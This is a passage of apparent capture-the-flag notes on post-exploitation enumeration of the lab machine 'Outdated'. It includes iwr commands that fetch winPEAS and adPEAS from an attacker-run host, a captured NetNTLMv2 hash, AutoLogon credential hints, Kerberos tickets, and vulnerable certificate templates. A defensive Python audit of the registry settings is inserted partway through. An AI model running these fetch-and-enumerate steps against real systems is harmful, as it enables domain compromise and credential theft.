PEAS
PS C:\Users\btables\Documents> iwr -uri http://10.10.14.23:2222/winPEASx64.exe -Outfile .\winPEASx64.exe
Delivery complete over HTTP
Executing PEAS
Env
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
SystemDrive: C:
ProgramFiles(x86): C:\Program Files (x86)
USERDNSDOMAIN: OUTDATED.HTB
ProgramW6432: C:\Program Files
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
TMP: C:\Users\btables\AppData\Local\Temp
PROCESSOR_ARCHITECTURE: AMD64
DriverData: C:\Windows\System32\Drivers\DriverData
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\btables
PROCESSOR_REVISION: 3100
TEMP: C:\Users\btables\AppData\Local\Temp
FPS_BROWSER_APP_PROFILE_STRING: Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING: Default
LOGONSERVER: \\DC
USERNAME: btables
SystemRoot: C:\Windows
OneDrive: C:\Users\btables\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
ProgramData: C:\ProgramData
HOMEPATH: \Users\btables
COMPUTERNAME: CLIENT
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ALLUSERSPROFILE: C:\ProgramData
CommonProgramW6432: C:\Program Files\Common Files
SESSIONNAME: Console
RecommendedLayer: NONE
HOMEDRIVE: C:
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
OS: Windows_NT
ProgramFiles: C:\Program Files
ComSpec: C:\Windows\system32\cmd.exe
PSModulePath: C:\Users\btables\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROMPT: $P$G
APPDATA: C:\Users\btables\AppData\Roaming
USERDOMAIN: OUTDATED
PROCESSOR_LEVEL: 23
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\btables\AppData\Local\Microsoft\WindowsApps;
LOCALAPPDATA: C:\Users\btables\AppData\Local
PSExecutionPolicyPreference: Bypass
USERDOMAIN_ROAMINGPROFILE: OUTDATED
PUBLIC: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100
LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
c:\Users\btables\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Drives
PS C:\Users\btables\Documents> dir A:\
dir : Cannot find path 'A:\' because it does not exist.
At line:1 char:1
+ dir A:\
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (A:\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Users\btables\Documents> dir D:\
dir : Cannot find path 'D:\' because it does not exist.
At line:1 char:1
+ dir D:\
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (D:\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
False-Positive
WSUS
KrbRelayUp
NTLM
btables::OUTDATED:1122334455667788:04066798b7e544cc33f395d8d559a152:010100000000000050d7181a2640da014b03e1b8498b8ace000000000800300030000000000000000000000000200000aa2ec91dca5d8667f92f9c6393b2949ae0492bf60efa2397bb21bbde2990dcc00a00100000000000000000000000000000000000090000000000000000000000
GPO
.NET Version
Token Privileges
User Privileges of the btables user
AutoLogon
PS C:\Users\btables\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ outdated
DefaultUserName REG_SZ btables
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0xa056900f
ShutdownFlags REG_DWORD 0x8000022b
AutoAdminLogon REG_SZ 1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-1427615864-4097738724-2873505330-1001
LastUsedUsername REG_SZ btables
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
AutoLogon is configured for the btables user
Credential may be extracted by dumping memory
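To make the Winlogon review above repeatable, here is an added Python audit (not part of the original notes) that parses `reg query` output for the Winlogon key and reports whether AutoLogon is enabled, for which account, and whether a cleartext DefaultPassword value is present; the sample registry text is constructed from the values shown above.

```python
import re

# Constructed sample: the AutoLogon-relevant values from a `reg query` of the
# Winlogon key, reproducing the values shown in the notes above.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    CachedLogonsCount    REG_SZ    10
    DefaultDomainName    REG_SZ    outdated
    DefaultUserName      REG_SZ    btables
    AutoAdminLogon       REG_SZ    1
    AutoLogonSID         REG_SZ    S-1-5-21-1427615864-4097738724-2873505330-1001
    LastUsedUsername     REG_SZ    btables
"""

# One value line: <name> <REG_type> <data>; data may be empty (e.g. LegalNoticeText).
VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_[A-Za-z_]+)\s*(.*)$")


def parse_reg_values(text):
    """Map value names (lower-cased) to (type, data) from `reg query` output."""
    values = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("HKEY_"):
            continue  # blank lines and key paths carry no values
        m = VALUE_RE.match(line)
        if m:
            name, reg_type, data = m.groups()
            values[name.lower()] = (reg_type.upper(), data.strip())
    return values


def assess_autologon(values):
    """Summarise AutoLogon exposure from parsed Winlogon values."""
    enabled = values.get("autoadminlogon", ("", "0"))[1] == "1"
    if not enabled:
        return {"enabled": False}
    domain = values.get("defaultdomainname", ("", ""))[1]
    user = values.get("defaultusername", ("", ""))[1]
    return {
        "enabled": True,
        "account": f"{domain}\\{user}" if domain else user,
        # A DefaultPassword value in the key is a cleartext password; when it is
        # absent the secret normally lives in LSA secrets, readable only by local
        # administrators (hence "extracted by dumping memory").
        "cleartext_password": "defaultpassword" in values,
        "sid": values.get("autologonsid", ("", ""))[1],
    }
```

Running `assess_autologon(parse_reg_values(SAMPLE_REG_OUTPUT))` on the sample reports AutoLogon enabled for `outdated\btables` with no cleartext password in the key.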
Modifiable Services
Installed Programs
Scheduled Tasks
Initially found and enumerated at a later stage
SMB
DNS
Kerberos Tickets
╔══════════╣ Looking for Kerberos tickets
╚ https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
servername: krbtgt/OUTDATED.HTB
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, pre_authent, renewable, forwarded, forwardable
=================================================================================================
servername: krbtgt/OUTDATED.HTB
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, pre_authent, initial, renewable, forwardable
=================================================================================================
servername: ldap/DC.outdated.htb
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:24:26 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
servername: cifs/DC
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:24:26 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
servername: cifs/DC.outdated.htb
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
adPEAS
PS C:\Users\btables\Documents> iwr -uri http://10.10.14.23:2222/adPEAS.ps1 -Outfile .\adPEAS.ps1
Delivery complete over HTTP
Executing adPEAS
Domain
  ms-DS-MachineAccountQuota
ADCS
  CA: outdated-DC-CA
  EFS
  WebServer: ENROLLEE_SUPPLIES_SUBJECT
  Machine
  User
  SubCA: ENROLLEE_SUPPLIES_SUBJECT
SharpHound
Ingestion Complete